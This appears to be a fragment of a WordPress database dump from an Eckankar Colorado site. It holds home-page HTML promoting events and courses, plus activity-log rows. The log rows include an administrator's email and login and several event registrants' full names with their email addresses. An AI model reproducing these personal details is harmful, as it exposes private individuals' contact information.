adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241969,41098,'user_id','2'),(241970,41098,'user_email','nada@zipnadanot.org'),(241971,41098,'user_login','S8zhaBda'),(241972,41098,'_user_id','2'),(241973,41098,'_user_login','S8zhaBda'),(241974,41098,'_user_email','nada@zipnadanot.org'),(241975,41098,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(241976,41098,'_message_key','user_logged_in'),(241977,41098,'_server_remote_addr','76.130.120.x'),(241978,41098,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(241979,41099,'post_id','269260'),(241980,41099,'post_type','mec-events'),(241981,41099,'post_title','Our Spiritual Wake-up Calls'),(241982,41099,'_message_key','post_updated'),(241983,41099,'_user_id','2'),(241984,41099,'_user_login','S8zhaBda'),(241985,41099,'_user_email','nada@zipnadanot.org'),(241986,41099,'_server_remote_addr','76.130.120.x'),(241987,41099,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269260&action=edit'),(241988,41100,'_user_id','2'),(241989,41100,'_user_login','S8zhaBda'),(241990,41100,'_user_email','nada@zipnadanot.org'),(241991,41100,'_message_key','user_logged_out'),(241992,41100,'_server_remote_addr','76.130.120.x'),(241993,41100,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec-events'),(241994,41101,'plugin_name','WP Fastest Cache'),(241995,41101,'plugin_current_version','1.2.1'),(241996,41101,'plugin_new_version','1.2.2'),(241997,41101,'_message_key','plugin_update_available'),(241998,41101,'_server_remote_addr','173.231.231.x'),(241968,41097,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(241967,41097,'_server_remote_addr','107.2.161.x'),(241966,41097,'_message_key','post_updated'),(241965,41097,'post_title',''),(241963,41097,'post_id','269381'),(241964,41097,'post_type','nf_sub'),(241962,41096,'_server_http_referer','https://eckankar-colorado.org/events/our-spiritual-wake-up-calls/?occurrence=2023-11-12'),(241961,41096,'_server_remote_addr','174.16.146.x'),(241960,41096,'_message_key','post_updated'),(241959,41096,'post_title','Kim Stoltman &#8211; kbatty11@yahoo.com'),(241958,41096,'post_type','mec-books'),(241957,41096,'post_id','269380'),(241956,41095,'_server_http_referer','https://eckankar-colorado.org/events/our-spiritual-wake-up-calls/?occurrence=2023-11-12'),(241955,41095,'_server_remote_addr','184.55.32.x'),(241954,41095,'_message_key','post_updated'),(241953,41095,'post_title','Bonnie Greenstreet &#8211; bngstreet@gmail.com'),(241952,41095,'post_type','mec-books'),(241951,41095,'post_id','269379'),(241950,41094,'_server_http_referer','https://eckankar-colorado.org/events/our-spiritual-wake-up-calls/?occurrence=2023-11-12'),(241949,41094,'_server_remote_addr','35.136.41.x'),(241948,41094,'_message_key','post_updated'),(241947,41094,'post_meta_added','3'),(241946,41094,'post_title','marc massengale &#8211; billybobak@yahoo.com'),(241945,41094,'post_type','mec-books'),(241944,41094,'post_id','269378'),(241943,41093,'_server_http_referer','https://eckankar-colorado.org/events/our-spiritual-wake-up-calls/?occurrence=2023-11-12'),(241942,41093,'_server_remote_addr','35.136.41.x'),(241940,41093,'post_title','marc massengale &#8211; billybobak@yahoo.com'),(241941,41093,'_message_key','post_updated'),(241939,41093,'post_type','mec-books'),(241938,41093,'post_id','269378'),(241937,41092,'_server_remote_addr','173.231.231.x'),(241936,41092,'_wp_cron_running','true'),(241935,41092,'_message_key','purged_events'),(241934,41092,'num_rows','516'),(241933,41092,'days','60'),(241908,41088,'_message_key','post_updated'),(241909,41088,'_user_id','2'),(241910,41088,'_user_login','S8zhaBda'),(241911,41088,'_user_email','nada@zipnadanot.org'),(241912,41088,'_server_remote_addr','76.130.120.x'),(241913,41088,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241914,41089,'_user_id','2'),(241915,41089,'_user_login','S8zhaBda'),(241916,41089,'_user_email','nada@zipnadanot.org'),(241917,41089,'_message_key','user_logged_out'),(241918,41089,'_server_remote_addr','76.130.120.x'),(241919,41089,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(241920,41090,'post_id','269377'),(241921,41090,'post_type','mec-books'),(241922,41090,'post_title','Jenny DeLapp Gallegos &#8211; jennydelapp@yahoo.com'),(241923,41090,'_message_key','post_updated'),(241924,41090,'_server_remote_addr','24.8.36.x'),(241925,41090,'_server_http_referer','https://eckankar-colorado.org/events/our-spiritual-wake-up-calls/?occurrence=2023-11-12'),(241926,41091,'post_id','269377'),(241927,41091,'post_type','mec-books'),(241928,41091,'post_title','Jenny DeLapp Gallegos &#8211; jennydelapp@yahoo.com'),(241929,41091,'post_meta_added','3'),(241930,41091,'_message_key','post_updated'),(241931,41091,'_server_remote_addr','24.8.36.x'),(241932,41091,'_server_http_referer','https://eckankar-colorado.org/events/our-spiritual-wake-up-calls/?occurrence=2023-11-12'),(243165,41213,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p 